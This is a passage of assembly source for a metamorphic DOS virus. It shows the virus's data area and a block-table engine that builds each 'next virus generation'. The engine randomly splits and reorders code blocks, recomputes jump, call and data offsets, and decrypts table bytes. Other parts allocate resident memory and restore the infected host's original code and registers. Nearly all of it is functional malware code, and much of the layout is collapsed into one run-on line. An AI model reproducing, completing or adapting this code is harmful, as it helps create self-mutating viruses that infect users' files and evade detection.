jmp_imm32 equ $  ; Offset of JMP imm32 (opcode 0eah)
    db 11101010b  ; JMP imm32 (opcode 0eah)
    dd 00h  ; Far pointer operand; virus_exit overwrites it with the
            ; initial IP and CS popped from the stack

; Data area (continues on the following source line).
ah_ db 00h  ; Accumulator register (high-order byte), scratch of decrypt_byte
probability dw 32h  ; Probability
crypt_key db 00h  ; 8-bit encryption/decryption key
sliding_key dw 00h  ; Sliding encryption/decryption key (declared as a
                    ; word and multiplied as a word in decrypt_byte; the
                    ; original comment calls it 8-bit)
executa_stat db 00h  ; Executable status (00h = COM executable)
origin_code db 11000011b,02h dup(00h)  ; Three saved bytes of the host
incorr_code db 11000011b,02h dup(00h)  ; Three bytes used by the unlabelled
                                       ; copy of restore_code
initial_cs dw 0fff0h  ; Initial CS relative to start of ...
initial_ss dw 0fff0h  ; Initial SS relative to start of ...
initial_ip dw 100h ; Initial IP incorrect_ip dw 100h ; Incorrect IP initial_sp dw 0fffeh ; Initial SP new_mcb_size dw 1000h ; New size in paragraphs mcb_size dw 0ffffh ; Size of memory block in paragraphs mcb_size_ dw 00h ; Size of memory block in paragraphs program_seg dw 00h ; Segment of PSP for current process virus_length dw 00h ; Length of virus vir_exit_off dw 00h ; Offset of virus_exit table_begin: first_table: tmc_table db 11101111b ; End of block db 11101110b ; Beginning of block dw 00h ; Block identification of tmc_table db 04h ; Four bytes instruction db 10001101b,00101110b ; LEA BP,[imm16] (opcode 8dh,2eh) dw 1234h ; Delta offset db 01h ; One byte instruction cld ; Clear direction flag db 02h ; Two bytes instruction mov ax,ds ; AX = segment of PSP for current ... db 04h ; Four bytes instruction mov [bp+1234h],ax ; Store segment of PSP for current... db 11101101b ; Data reference dw 0befh ; Pointer to program_seg_ db 01h ; One byte instruction dec ax ; AX = segment of current Memory C... db 02h ; Two bytes instruction mov ds,ax ; DS = segment of current Memory C... db 03h ; Three bytes instruction mov ax,ds:[03h] ; AX = size of memory block in par... db 03h ; Three bytes instruction cmp ax,1900h ; Insufficient memory? db 01110010b+10000000b ; Below? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 04h ; Four bytes instruction mov [bp+1234h],ax ; Store size of memory block in p... db 11101101b ; Data reference dw 1394h ; Pointer to mcb_size___ db 04h ; Four bytes instruction mov bx,[bp+1234h] ; BX = new size in paragraphs db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 02h ; Two bytes instruction mov ah,4ah ; Resize memory block db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? 
Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 02h ; Two bytes instruction mov ah,48h ; Allocate memory db 04h ; Four bytes instruction mov bx,[bp+1234h] ; BX = size of memory block in par... db 11101101b ; Data reference dw 1394h ; Pointer to mcb_size___ db 04h ; Four bytes instruction sub bx,[bp+1234h] ; Subtract new size in paragraphs ... db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 01h ; One byte instruction dec bx ; BX = number of paragraphs to all... db 04h ; Four bytes instruction cmp bx,267h ; Insufficient memory? db 01110010b+10000000b ; Below? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to terminate_ dw 0beeh ; Pointer to terminate_ db 02h ; Two bytes instruction mov es,ax ; ES = segment of allocated memory db 07h ; Seven bytes instruction add es:[02h],6942h ; Store 16-bit random number db 07h ; Seven bytes instruction mov word ptr es:[0ch],00h db 07h ; Seven bytes instruction mov es:[04h],118h ; Store offset of block information db 07h ; Seven bytes instruction mov es:[06h],2c8h ; Store offset of CALL; JMP; Jcc i... db 07h ; Seven bytes instruction mov es:[08h],5a8h ; Store offset of data information db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of tmc_table_ db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov bx,730h ; BX = offset of next virus genera... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fa0h ; Pointer to initial_tmc db 11101111b ; End of block initial_tmc_ db 11101110b ; Beginning of block dw 0fa0h ; Block identification of initial_... 
db 03h ; Three bytes instruction mov di,10h ; DI = offset of table of blocks db 02h ; Two bytes instruction xor ax,ax ; Zero AX db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block tmc_ini_loo db 11101110b ; Beginning of block dw 0bb8h ; Block identification of tmc_ini_loo db 02h ; Two bytes instruction add si,ax ; SI = offset of block or instruct... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction or al,al ; End of table? db 01110100b+10000000b ; Zero? Jump to calc_blocks_ dw 0bbch ; Pointer to calc_blocks_ db 02h ; Two bytes instruction cmp al,11101000b ; CALL; JMP; Data reference; Jcc? db 01110011b+10000000b ; Above or equal? Jump to exam_blo__ dw 0bb9h ; Pointer to exam_blo__ db 02h ; Two bytes instruction cmp al,10h ; Data? db 01110110b+10000000b ; Below or equal? Jump to tmc_ini_... dw 0bb8h ; Pointer to tmc_ini_loo db 02h ; Two bytes instruction sub al,10h ; AL = length of data db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block exam_blo__ db 11101110b ; Beginning of block dw 0bb9h ; Block identification of exam_blo__ db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01110101b+10000000b ; Not equal? Jump to exam_blo___ dw 0bbah ; Pointer to exam_blo___ db 02h ; Two bytes instruction mov al,00h ; Don't add anything to offset wit... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block exam_blo___ db 11101110b ; Beginning of block dw 0bbah ; Block identification of exam_blo___ db 02h ; Two bytes instruction cmp al,11101110b ; Beginning of block? db 01110101b+10000000b ; Not equal? 
Jump to next_byte_ dw 0bbbh ; Pointer to next_byte_ db 02h ; Two bytes instruction mov ax,si ; AX = offset of block identification db 01h ; One byte instruction dec ax ; AX = offset of block within table db 01h ; One byte instruction stosw ; Store offset of block within table db 03h ; Three bytes instruction mov ax,0ffffh ; Block is still in one part db 01h ; One byte instruction stosw ; Store block identification db 03h ; Three bytes instruction mov ax,02h ; Add two to offset within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block next_byte_ db 11101110b ; Beginning of block dw 0bbbh ; Block identification of next_byte_ db 02h ; Two bytes instruction mov al,02h ; Add two to offset within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bb8h ; Pointer to tmc_ini_loo db 11101111b ; End of block calc_blocks_ db 11101110b ; Beginning of block dw 0bbch ; Block identification of calc_blo... db 03h ; Three bytes instruction lea ax,[di-10h] ; AX = number of blocks multiplied... 
db 02h ; Two bytes instruction shr ax,01h ; Divide number of blocks by two db 02h ; Two bytes instruction shr ax,01h ; Divide number of blocks by two db 04h ; Four bytes instruction mov es:[0ah],ax ; Store number of blocks db 02h ; Two bytes instruction xor ax,ax ; End of table db 01h ; One byte instruction stosw ; Store end of table db 03h ; Three bytes instruction mov di,10h ; DI = offset of table of blocks db 03h ; Three bytes instruction mov si,es:[di] ; SI = offset of block within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc0h ; Pointer to exam_bl db 11101111b ; End of block split_bloc db 11101110b ; Beginning of block dw 0bbdh ; Block identification of split_bloc db 01h ; One byte instruction push bp ; Save BP at stack db 05h ; Five bytes instruction mov bp,es:[0ah] ; BP = number of blocks db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 01h ; One byte instruction pop bp ; Load BP from stack db 02h ; Two bytes instruction shl ax,01h ; Multiply random number with two db 02h ; Two bytes instruction shl ax,01h ; Multiply random number with two db 03h ; Three bytes instruction add ax,10h ; Add ten to random number db 02h ; Two bytes instruction mov di,ax ; DI = random offset within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bbeh ; Pointer to exam_nxt_bl_ db 11101111b ; End of block exam_nxt_bl_ db 11101110b ; Beginning of block dw 0bbeh ; Block identification of exam_nxt... db 03h ; Three bytes instruction add di,04h ; DI = offset of next offset withi... db 03h ; Three bytes instruction mov si,es:[di] ; SI = offset of next block within... db 02h ; Two bytes instruction or si,si ; End of table? db 01110101b+10000000b ; Not zero? 
Jump to exam_blo____ dw 0bbfh ; Pointer to exam_blo____ db 03h ; Three bytes instruction mov di,10h ; DI = offset of table of blocks db 03h ; Three bytes instruction mov si,es:[di] ; SI = offset of block within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bbfh ; Pointer to exam_blo____ db 11101111b ; End of block exam_blo____ db 11101110b ; Beginning of block dw 0bbfh ; Block identification of exam_blo... db 01h ; One byte instruction push ax ; Save AX at stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 01h ; One byte instruction dec si ; Decrease offset of block within ... db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01h ; One byte instruction pop ax ; Load AX from stack db 01110101b+10000000b ; Not equal? Jump to exam_bl dw 0bc0h ; Pointer to exam_bl db 02h ; Two bytes instruction cmp di,ax ; End of table of blocks? db 01110101b+10000000b ; Not equal? Jump to exam_nxt_bl_ dw 0bbeh ; Pointer to exam_nxt_bl_ db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcah ; Pointer to exam_tbl_in db 11101111b ; End of block exam_bl db 11101110b ; Beginning of block dw 0bc0h ; Block identification of exam_bl db 04h ; Four bytes instruction mov ax,es:[di+02h] ; AX = block information db 03h ; Three bytes instruction cmp ax,0ffffh ; Block is still in one part? db 01110100b+10000000b ; Equal? Jump to exam_bl_ dw 0bc1h ; Pointer to exam_bl_ db 01h ; One byte instruction push di ; Save DI at stack db 02h ; Two bytes instruction mov di,ax ; DI = offset of end of first part... db 02h ; Two bytes instruction mov al,11101001b ; JMP imm16 (opcode 0e9h) db 01h ; One byte instruction stosb ; Store JMP imm16 db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 02h ; Two bytes instruction sub ax,di ; Subtract offset of end of first ... 
db 01h ; One byte instruction stosw ; Store 16-bit immediate db 01h ; One byte instruction pop di ; Load DI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block exam_bl_ db 11101110b ; Beginning of block dw 0bc1h ; Block identification of exam_bl_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01110100b+10000000b ; Equal? Jump to end_of_bloc dw 0bc9h ; Pointer to end_of_bloc db 02h ; Two bytes instruction cmp al,10h ; Data; CALL; JMP; Data reference...? db 01110111b+10000000b ; Above? Jump to exam_bl__ dw 0bc2h ; Pointer to exam_bl__ db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push bp ; Save BP at stack db 04h ; Four bytes instruction mov bp,[bp+1234h] ; BP = probability db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 02h ; Two bytes instruction or ax,ax ; Split up block? db 01h ; One byte instruction pop bp ; Load BP from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 01110100b+10000000b ; Zero? Jump to split_bloc_ dw 0bc8h ; Pointer to split_bloc_ db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc2h ; Pointer to exam_bl__ db 11101111b ; End of block exam_bl__ db 11101110b ; Beginning of block dw 0bc2h ; Block identification of exam_bl__ db 02h ; Two bytes instruction cmp al,11101111b ; End of block? db 01110100b+10000000b ; Equal? Jump to end_of_bloc dw 0bc9h ; Pointer to end_of_bloc db 02h ; Two bytes instruction cmp al,11101000b ; CALL; JMP; Data reference; Jcc? db 01110011b+10000000b ; Above or equal? Jump to exam_data_ dw 0bc4h ; Pointer to exam_data_ db 02h ; Two bytes instruction cmp al,10h ; Data? db 01110110b+10000000b ; Below or equal? 
Jump to sto_instruc dw 0bc3h ; Pointer to sto_instruc db 02h ; Two bytes instruction sub al,10h ; AL = length of data db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc3h ; Pointer to sto_instruc db 11101111b ; End of block sto_instruc db 11101110b ; Beginning of block dw 0bc3h ; Block identification of sto_instruc db 02h ; Two bytes instruction xor cx,cx ; Zero CX db 02h ; Two bytes instruction mov cl,al ; CL = length of instruction db 01h ; One byte instruction push di ; Save DI at stack db 02h ; Two bytes instruction mov di,bx ; DI = offset within next virus ge... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0beah ; Pointer to sto_ins_loo db 11101111b ; End of block sto_ins_loo db 11101110b ; Beginning of block dw 0beah ; Block identification of sto_ins_loo db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 01h ; One byte instruction stosb ; Store byte of instruction db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to sto_ins_loo dw 0beah ; Pointer to sto_ins_loo db 02h ; Two bytes instruction mov bx,di ; BX = offset within next virus ge... db 01h ; One byte instruction pop di ; Load DI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block exam_data_ db 11101110b ; Beginning of block dw 0bc4h ; Block identification of exam_data_ db 02h ; Two bytes instruction cmp al,11101101b ; Data reference? db 01110101b+10000000b ; Not equal? Jump to exam_bl___ dw 0bc5h ; Pointer to exam_bl___ db 01h ; One byte instruction push di ; Load DI from stack db 05h ; Five bytes instruction mov di,es:[08h] ; DI = offset within data information db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 01h ; One byte instruction dec ax ; Decrease offset within next viru... db 01h ; One byte instruction stosw ; Store offset within next virus g... 
db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be1h ; Pointer to decrypt_id_ db 01h ; One byte instruction stosw ; Store block identification db 05h ; Five bytes instruction mov es:[08h],di ; Store offset within data informa... db 01h ; One byte instruction pop di ; Load DI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block exam_bl___ db 11101110b ; Beginning of block dw 0bc5h ; Block identification of exam_bl___ db 02h ; Two bytes instruction cmp al,11101110b ; Beginning of block? db 01110101b+10000000b ; Not equal? Jump to sto_call_jm_ dw 0bc7h ; Pointer to sto_call_jm_ db 01h ; One byte instruction push di ; Save DI at stack db 05h ; Five bytes instruction mov di,es:[04h] ; DI = offset within block informa... db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction stosw ; Store offset within next virus ge... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be1h ; Pointer to decrypt_id_ db 01h ; One byte instruction stosw ; Store block identification db 05h ; Five bytes instruction mov es:[04h],di ; Store offset within block inform... db 03h ; Three bytes instruction cmp ax,4c5h ; Block identification of tmc_table_? db 01110101b+10000000b ; Not equal? Jump to exam_messag dw 0bc6h ; Pointer to exam_messag db 01h ; One byte instruction push si ; Save SI at stack db 02h ; Two bytes instruction mov di,bx ; DI = offset within next virus ge... db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of tmc_table_ db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 03h ; Three bytes instruction mov cx,(table_end-table_begin) db 02h ; Two bytes instruction rep movsb ; Move table to top of memory db 02h ; Two bytes instruction mov bx,di ; BX = offset within next virus ge... 
db 01h ; One byte instruction pop si ; Load SI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bebh ; Pointer to examine_nex db 11101111b ; End of block exam_messag db 11101110b ; Beginning of block dw 0bc6h ; Block identification of exam_messag db 03h ; Three bytes instruction cmp ax,2328h ; Block identification of message? db 01110101b+10000000b ; Not equal? Jump to exam_probab dw 0bedh ; Pointer to exam_probab db 03h ; Three bytes instruction mov ax,14h ; Probability of including message db 04h ; Four bytes instruction cmp [bp+1234h],ax ; Include message? db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 01110011b+10000000b ; Above or equal? Jump to examine_... dw 0bebh ; Pointer to examine_nex db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction sub al,10h ; AL = length of message db 02h ; Two bytes instruction mov ah,00h ; Zero AH db 02h ; Two bytes instruction add si,ax ; SI = offset of end of message db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bebh ; Pointer to examine_nex db 11101111b ; End of block exam_probab db 11101110b ; Beginning of block dw 0bedh ; Block identification of exam_probab db 03h ; Three bytes instruction cmp ax,0bech ; Block identification of probabi...? db 01110101b+10000000b ; Not equal? Jump to examine_nex dw 0bebh ; Pointer to examine_nex db 04h ; Four bytes instruction mov ax,[bp+1234h] ; AX = probability_ db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 01h ; One byte instruction dec ax ; Decrease probability db 03h ; Three bytes instruction cmp ax,05h ; Probability too small? db 01110011b+10000000b ; Above or equal? Jump to store_pr... 
dw 0bf5h ; Pointer to store_proba db 03h ; Three bytes instruction mov ax,64h ; Reset probability db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bf5h ; Pointer to store_proba db 11101111b ; End of block store_proba db 11101110b ; Beginning of block dw 0bf5h ; Block identification of store_proba db 03h ; Three bytes instruction mov es:[bx],ax ; Store probability db 03h ; Three bytes instruction add bx,02h ; Add two to offset within next vi... db 03h ; Three bytes instruction add si,03h ; SI = offset of beginning of next... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bebh ; Pointer to examine_nex db 11101111b ; End of block examine_nex db 11101110b ; Beginning of block dw 0bebh ; Block identification of examine_nex db 01h ; One byte instruction pop di ; Load DI from stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc2h ; Pointer to exam_bl__ db 11101111b ; End of block sto_call_jm_ db 11101110b ; Beginning of block dw 0bc7h ; Block identification of sto_call... db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push di ; Save DI at stack db 05h ; Five bytes instruction mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction stosw ; Store offset within next virus g... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be1h ; Pointer to decrypt_id_ db 01h ; One byte instruction stosw ; Store block identification db 05h ; Five bytes instruction mov es:[06h],di ; Store offset within CALL; JMP; J... db 01h ; One byte instruction pop di ; Load DI from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 03h ; Three bytes instruction mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... db 03h ; Three bytes instruction add bx,03h ; Add three to offset within next ... db 02h ; Two bytes instruction cmp al,11110000b ; Jump condition? 
db 01110010b+10000000b ; Below? Jump to exam_bl_ dw 0bc1h ; Pointer to exam_bl_ db 01h ; One byte instruction inc bx ; Increase offset within next viru... db 01h ; One byte instruction inc bx ; Increase offset within next viru... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block split_bloc_ db 11101110b ; Beginning of block dw 0bc8h ; Block identification of split_bloc_ db 04h ; Four bytes instruction mov es:[di+02h],bx ; Store offset within next virus g... db 03h ; Three bytes instruction add bx,03h ; Add three to offset within next ... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc9h ; Pointer to end_of_bloc db 11101111b ; End of block end_of_bloc db 11101110b ; Beginning of block dw 0bc9h ; Block identification of end_of_bloc db 01h ; One byte instruction dec si ; Decrease offset of block within ... db 03h ; Three bytes instruction mov es:[di],si ; Store offset of block within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bbdh ; Pointer to of split_bloc db 11101111b ; End of block exam_tbl_in db 11101110b ; Beginning of block dw 0bcah ; Block identification of exam_tbl_in db 06h ; Six bytes instruction cmp word ptr es:[0ch],00h db 01110101b+10000000b ; End of second table? Jump to cor... dw 0fa1h ; Pointer to correc_i16 db 01h ; One byte instruction pop si ; Load SI from stack db 05h ; Five bytes instruction mov es:[0ch],bx ; Store offset within next virus g... db 04h ; Four bytes instruction add si,(second_table-first_table) db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fa0h ; Pointer to initial_tmc db 11101111b ; End of block correc_i16 db 11101110b ; Beginning of block dw 0fa1h ; Block identification of correc_i16 db 01h ; One byte instruction push es ; Save ES at stack db 01h ; One byte instruction pop ds ; Load DS from stack (ES) db 04h ; Four bytes instruction sub bx,730h ; Subtract offset of next virus ge... 
db 04h ; Four bytes instruction mov ds:[0eh],bx ; Store length of virus db 03h ; Three bytes instruction mov si,2c8h ; SI = offset of CALL; JMP; Jcc im... db 04h ; Four bytes instruction mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of CALL; JMP; Jc... db 02h ; Two bytes instruction shr cx,01h ; Divide number of CALL imm16; JMP... db 02h ; Two bytes instruction shr cx,01h ; Divide number of CALL imm16; JMP... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcbh ; Pointer to jmp_call_lo db 11101111b ; End of block jmp_call_lo db 11101110b ; Beginning of block dw 0bcbh ; Block identification of jmp_call_lo db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push cx ; Save CX at stack db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov si,118h ; SI = offset of block information db 04h ; Four bytes instruction mov cx,ds:[04h] ; CX = offset of end of block info... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of block informa... db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcch ; Pointer to find_block__ db 11101111b ; End of block find_block__ db 11101110b ; Beginning of block dw 0bcch ; Block identification of find_blo... db 03h ; Three bytes instruction cmp ax,[si+02h] ; Found block? db 01110100b+10000000b ; Equal? Jump to found_bloc dw 0bcdh ; Pointer to found_bloc db 03h ; Three bytes instruction add si,04h ; SI = offset of next block in table db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? 
Jump to find_block__ dw 0bcch ; Pointer to find_block__ db 11101111b ; End of block found_bloc db 11101110b ; Beginning of block dw 0bcdh ; Block identification of found_bloc db 02h ; Two bytes instruction mov dx,[si] ; DX = offset of block db 01h ; One byte instruction pop si ; Load SI from stack db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction pop bx ; Load BX from stack (AX) db 02h ; Two bytes instruction mov al,[bx] ; AL = first byte of instruction db 02h ; Two bytes instruction cmp al,11110000b ; Jump condition? db 01110010b+10000000b ; Below? Jump to sto_call_j dw 0bcfh ; Pointer to sto_call_j db 03h ; Three bytes instruction sub byte ptr [bx],10000000b db 01h ; One byte instruction inc bx ; BX = offset of 8-bit immediate db 01h ; One byte instruction push dx ; Save DX at stack db 02h ; Two bytes instruction sub dx,bx ; Subtract offset within next viru... db 01h ; One byte instruction dec dx ; Decrease 8-bit immediate db 03h ; Three bytes instruction cmp dx,7fh ; 8-bit immediate out of range? db 01111111b+10000000b ; Greater? Jump to invert_jcc_ dw 0bceh ; Pointer to invert_jcc_ db 03h ; Three bytes instruction cmp dx,0ff80h ; 8-bit immediate out of range? db 01111100b+10000000b ; Less? 
Jump to invert_jcc_ dw 0bceh ; Pointer to invert_jcc_ db 02h ; Two bytes instruction mov [bx],dl ; Store 8-bit immediate db 01h ; One byte instruction inc bx ; BX = offset of end of Jcc imm8 db 04h ; Four bytes instruction mov [bx],1001000010010000b db 04h ; Four bytes instruction mov byte ptr [bx+02h],10010000b db 01h ; One byte instruction pop dx ; Load DX from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd0h ; Pointer to correc_i16_ db 11101111b ; End of block invert_jcc_ db 11101110b ; Beginning of block dw 0bceh ; Block identification of invert_jcc_ db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction dec bx ; BX = offset of Jcc imm8 db 03h ; Three bytes instruction xor byte ptr [bx],00000001b db 01h ; One byte instruction inc bx ; BX = offset of 8-bit immediate db 03h ; Three bytes instruction mov byte ptr [bx],03h ; Store 8-bit immediate db 01h ; One byte instruction inc bx ; BX = offset of JMP imm16 db 02h ; Two bytes instruction mov al,11101001b ; JMP imm16 (opcode 0e9h) db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcfh ; Pointer to sto_call_j db 11101111b ; End of block sto_call_j db 11101110b ; Beginning of block dw 0bcfh ; Block identification of sto_call_j db 02h ; Two bytes instruction mov [bx],al ; Store CALL imm16; JMP imm16 db 01h ; One byte instruction inc bx ; BX = offset of 16-bit immediate db 02h ; Two bytes instruction sub dx,bx ; Subtract offset within next viru... db 01h ; One byte instruction dec dx ; Decrease 16-bit immediate db 01h ; One byte instruction dec dx ; Decrease 16-bit immediate db 02h ; Two bytes instruction mov [bx],dx ; Store 16-bit immediate db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd0h ; Pointer to correc_i16_ db 11101111b ; End of block correc_i16_ db 11101110b ; Beginning of block dw 0bd0h ; Block identification of correc_16_ db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? 
Jump to jmp_call_lo dw 0bcbh ; Pointer to jmp_call_lo db 03h ; Three bytes instruction mov si,5a8h ; SI = offset of data information db 04h ; Four bytes instruction mov cx,ds:[08h] ; CX = offset of end of data infor... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of data informat... db 02h ; Two bytes instruction shr cx,01h ; Divide number of data references... db 02h ; Two bytes instruction shr cx,01h ; Divide number of data references... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd1h ; Pointer to data_ref_lo db 11101111b ; End of block data_ref_lo db 11101110b ; Beginning of block dw 0bd1h ; Block identification of data_ref_lo db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push cx ; Save CX at stack db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov si,118h ; SI = offset of block information db 04h ; Four bytes instruction mov cx,ds:[04h] ; CX = offset of end of block info... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of block informa... db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd2h ; Pointer to find_bloc db 11101111b ; End of block find_bloc db 11101110b ; Beginning of block dw 0bd2h ; Block identification to find_bloc db 03h ; Three bytes instruction cmp ax,[si+02h] ; Found block? db 01110100b+10000000b ; Equal? Jump to found_bloc_ dw 0bd3h ; Pointer to found_bloc_ db 03h ; Three bytes instruction add si,04h ; SI = offset of next block in table db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? 
Jump to find_bloc dw 0bd2h ; Pointer to find_bloc db 11101111b ; End of block found_bloc_ db 11101110b ; Beginning of block dw 0bd3h ; Block identification of found_bloc_ db 02h ; Two bytes instruction mov ax,[si] ; AX = offset of block db 01h ; One byte instruction pop si ; Load SI from stack db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction pop bx ; Load BX from stack (AX) db 03h ; Three bytes instruction sub ax,730h ; Subtract offset of next virus ge... db 02h ; Two bytes instruction mov [bx],ax ; Store 16-bit immediate db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to data_ref_lo dw 0bd1h ; Pointer to data_ref_lo db 11101001b ; JMP imm16 (opcode 0e9h) dw 1772h ; Pointer to restore_cod db 11101111b ; End of block restore_cod db 11101110b ; Beginning of block dw 1772h ; Block identification of restore_cod db 04h ; Four bytes instruction mov ax,[bp+1234h] ; AX = segment of PSP for current ... db 11101101b ; Data reference dw 0befh ; Pointer to program_seg_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial SS relative to star... db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial SS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save initial SP at stack db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial CS relative to star... db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial CS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... 
